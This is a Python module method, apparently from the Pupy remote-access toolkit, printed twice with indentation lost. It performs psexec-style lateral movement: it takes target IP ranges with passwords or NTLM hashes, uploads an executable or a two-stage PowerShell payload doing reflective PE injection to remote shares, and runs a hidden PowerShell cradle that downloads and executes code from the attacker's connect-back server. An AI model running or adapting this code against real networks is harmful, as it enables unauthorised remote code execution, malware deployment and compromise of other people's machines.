def run(self, args):
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
ext = ''
remote_path = ''
dst_folder = ''
file_to_upload = []
if args.file or args.ps1:
tmp_dir = tempfile.gettempdir()
if self.client.is_windows():
remote_path = '%s\\' % self.client.conn.modules[
'os.path'].expandvars("%ALLUSERSPROFILE%")
else:
remote_path = '/tmp/'
# write on the temp directory
if args.share == 'C$':
dst_folder = "C:\\Windows\\TEMP\\"
# write on the root directory
else:
dst_folder = '%s\\' % args.share.replace('$', ':')
# if executable to upload
if args.file:
if not os.path.exists(args.file):
self.error('File not found: %s' % args.file)
return
if not args.file.endswith('.exe'):
self.error('Only executable files could be uploaded')
return
ext = '.exe'
random_name = ''.join(random.sample(string.ascii_letters,
10)) + ext
shutil.copy(args.file, tmp_dir + os.sep + random_name)
file_to_upload = [random_name]
# if uploading powershell
else:
ext = '.txt'
first_stage = ''.join(random.sample(string.ascii_letters,
10)) + ext
second_stage = ''.join(random.sample(string.ascii_letters,
10)) + ext
file_to_upload = [first_stage, second_stage]
launcher = """cat {invoke_reflective_random_name} | Out-String | IEX""".format(
invoke_reflective_random_name=dst_folder + second_stage)
launcher = create_ps_command(launcher,
force_ps32=True,
nothidden=False)
open(tmp_dir + os.sep + first_stage, 'w').write(launcher)
self.success('first stage created: %s' % tmp_dir + os.sep +
first_stage)
command = getInvokeReflectivePEInjectionWithDLLEmbedded(
self.client.get_conf())
open(tmp_dir + os.sep + second_stage, 'w').write(command)
self.success('second stage created: %s' % tmp_dir + os.sep +
second_stage)
for file in file_to_upload:
src = tmp_dir + os.sep + file
dst = remote_path + file
self.info("Uploading file to {0}".format(dst))
upload(self.client.conn, src, dst)
self.success("File uploaded")
if args.ps1_oneliner:
res = self.client.conn.modules['pupy'].get_connect_back_host()
ip, port = res.rsplit(':', 1)
cmd = '%s/pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port %s connect --host %s:%s' % (
os.getcwd(), str(args.ps1_port), ip, port)
self.warning('starting the local server')
process = Popen(cmd.split(' '),
stdout=PIPE,
stderr=PIPE,
stdin=PIPE)
time.sleep(2)
# check if the server has been launched corretly
if process.poll():
self.error(
'the server has not been launched, check if the port %s or if the file %s/pupygen.py exists'
% (str(args.ps1_port), os.getcwd()))
return
self.success('server started (pid: %s)' % process.pid)
args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % (
ip, str(args.ps1_port))
self.info("Loading dependencies")
self.client.load_package("impacket")
self.client.load_package('ntpath')
self.client.load_package("calendar")
self.client.load_package("pupyutils.psexec")
with redirected_stdo(self.client.conn):
for host in hosts:
self.info("Connecting to the remote host: %s" % host)
self.client.conn.modules["pupyutils.psexec"].connect(
host, args.port, args.user, args.passwd, args.hash,
args.share, file_to_upload, remote_path, dst_folder,
args.command, args.domain, args.execm)
if args.ps1_oneliner:
self.warning('stopping the local server (pid: %s)' %
process.pid)
process.terminate()
elif args.ps1:
self.warning('Do not forget to remove the file: %s' %
dst_folder + first_stage)
self.warning('Do not forget to remove the file: %s' %
dst_folder + second_stage)
def run(self, args):
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
ext = ''
remote_path = ''
dst_folder = ''
file_to_upload = []
if args.file or args.ps1:
tmp_dir = tempfile.gettempdir()
if self.client.is_windows():
remote_path = '%s\\' % self.client.conn.modules['os.path'].expandvars("%ALLUSERSPROFILE%")
else:
remote_path = '/tmp/'
# write on the temp directory
if args.share == 'C$':
dst_folder = "C:\\Windows\\TEMP\\"
# write on the root directory
else:
dst_folder = '%s\\' % args.share.replace('$', ':')
# if executable to upload
if args.file:
if not os.path.exists(args.file):
self.error('File not found: %s' % args.file)
return
if not args.file.endswith('.exe'):
self.error('Only executable files could be uploaded')
return
ext = '.exe'
random_name = ''.join(random.sample(string.ascii_letters, 10)) + ext
shutil.copy(args.file, tmp_dir + os.sep + random_name)
file_to_upload = [random_name]
# if uploading powershell
else:
ext = '.txt'
first_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext
second_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext
file_to_upload = [first_stage, second_stage]
launcher = """cat {invoke_reflective_random_name} | Out-String | IEX""".format(invoke_reflective_random_name=dst_folder + second_stage)
launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
open(tmp_dir + os.sep + first_stage, 'w').write(launcher)
self.success('first stage created: %s' % tmp_dir + os.sep + first_stage)
command = getInvokeReflectivePEInjectionWithDLLEmbedded(self.client.get_conf())
open(tmp_dir + os.sep + second_stage, 'w').write(command)
self.success('second stage created: %s' % tmp_dir + os.sep + second_stage)
for file in file_to_upload:
src = tmp_dir + os.sep + file
dst = remote_path + file
self.info("Uploading file to {0}".format(dst))
upload(self.client.conn, src, dst)
self.success("File uploaded")
if args.ps1_oneliner:
res=self.client.conn.modules['pupy'].get_connect_back_host()
ip, port = res.rsplit(':', 1)
cmd = '%s/pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port %s connect --host %s:%s' % (os.getcwd(), str(args.ps1_port), ip, port)
self.warning('starting the local server')
process = Popen(cmd.split(' '), stdout=PIPE, stderr=PIPE, stdin=PIPE)
time.sleep(2)
# check if the server has been launched corretly
if process.poll():
self.error('the server has not been launched, check if the port %s or if the file %s/pupygen.py exists' % (str(args.ps1_port), os.getcwd()))
return
self.success('server started (pid: %s)' % process.pid)
args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % (ip, str(args.ps1_port))
self.info("Loading dependencies")
self.client.load_package("impacket")
self.client.load_package('ntpath')
self.client.load_package("calendar")
self.client.load_package("pupyutils.psexec")
with redirected_stdo(self.client.conn):
for host in hosts:
self.info("Connecting to the remote host: %s" % host)
self.client.conn.modules["pupyutils.psexec"].connect(host, args.port, args.user, args.passwd, args.hash, args.share, file_to_upload, remote_path, dst_folder, args.command, args.domain, args.execm)
if args.ps1_oneliner:
self.warning('stopping the local server (pid: %s)' % process.pid)
process.terminate()
elif args.ps1:
self.warning('Do not forget to remove the file: %s' % dst_folder + first_stage)
self.warning('Do not forget to remove the file: %s' % dst_folder + second_stage)